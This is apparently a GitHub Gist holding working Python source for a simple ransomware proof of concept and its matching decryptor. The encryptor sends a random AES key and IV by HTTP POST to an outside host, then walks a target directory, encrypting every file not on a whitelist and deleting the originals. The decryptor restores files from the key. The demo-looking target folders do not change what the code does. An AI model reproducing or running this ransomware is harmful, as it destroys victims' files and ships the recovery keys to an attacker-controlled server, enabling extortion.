Skip to content

Instantly share code, notes, and snippets.

@zmallen
Created February 23, 2014 16:48
Show Gist options
  • Save zmallen/9173837 to your computer and use it in GitHub Desktop.
Save zmallen/9173837 to your computer and use it in GitHub Desktop.
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
import subprocess as sub
class lolCrypt:
def __init__(self, key, iv):
self.key = key
self.iv = iv
self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)
def encrypt_file(self, in_filename, chunksize=64 * 1024):
out_filename = in_filename + '.lol'
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(self.cryptor.encrypt(chunk))
def walk(self, target_dir, white_list):
try:
for dirname, dirnames, filenames in os.walk(target_dir):
# print path to all filenames.
for filename in filenames:
try:
full_file = os.path.join(dirname, filename)
if filename not in white_list:
self.encrypt_file(full_file)
os.remove(full_file)
except:
continue
except:
pass
def drop(self):
conn = httplib.HTTPConnection('192.168.1.86', '7000')
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
params = urllib.urlencode({'key':self.key.encode('hex'), 'iv':self.iv.encode('hex')})
conn.request('POST', '/submit', params, headers)
def main():
key = os.urandom(16)
iv = os.urandom(16)
aes = lolCrypt(key, iv)
print 'key: %s\niv: %s' % (key.encode('hex'), iv.encode('hex'))
if _platform == "linux" or _platform == "linux2":
# linux
print 'linux'
linux_whitelist = ['cat', 'wall', 'echo', 'python', 'ifconfig', 'ls', 'python2.7', 'python2.6', 'bash', 'chmod']
aes.drop()
aes.walk("/root/wat", linux_whitelist)
elif _platform == "darwin":
# OS X
print 'darwin'
osx_whitelist = ["no.no"]
aes.walk("/Users/techy/git/crypto/wat", osx_whitelist)
elif _platform == "win32":
print 'winders'
if __name__ == '__main__':
main()
###### decrypt ###
from Crypto.Cipher import AES
import os, struct, sys, httplib, urllib
from sys import platform as _platform
class lolCrypt:
def __init__(self, key, iv):
self.key = key
self.iv = iv
self.cryptor = AES.new(self.key, AES.MODE_CBC, self.iv)
def decrypt_file(self, in_filename, chunksize=24 * 1024):
if not in_filename.endswith('.lol'):
print 'uh ohs, no .lol in filename :D -> %s' % (in_filename)
return
out_filename = in_filename[0:-4]
try:
with open(in_filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(self.cryptor.decrypt(chunk))
outfile.truncate(origsize)
os.remove(in_filename)
except:
print 'Error:', sys.exc_info()[0]
def walk(self, target_dir):
print 'walkin'
for dirname, dirnames, filenames in os.walk(target_dir):
# print path to all filenames.
for filename in filenames:
full_file = os.path.join(dirname, filename)
print 'file %s' % full_file
self.decrypt_file(full_file)
def main():
# fill out key and iv from other output here
key = ''
iv = ''
aes = lolCrypt(key.decode('hex'), iv.decode('hex'))
if _platform == 'linux' or _platform == 'linux2':
# linux
print 'linux'
aes.walk('/wat')
elif _platform == "darwin":
# OS X
print 'darwin'
aes.walk('/Users/techy/git/crypto/wat')
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment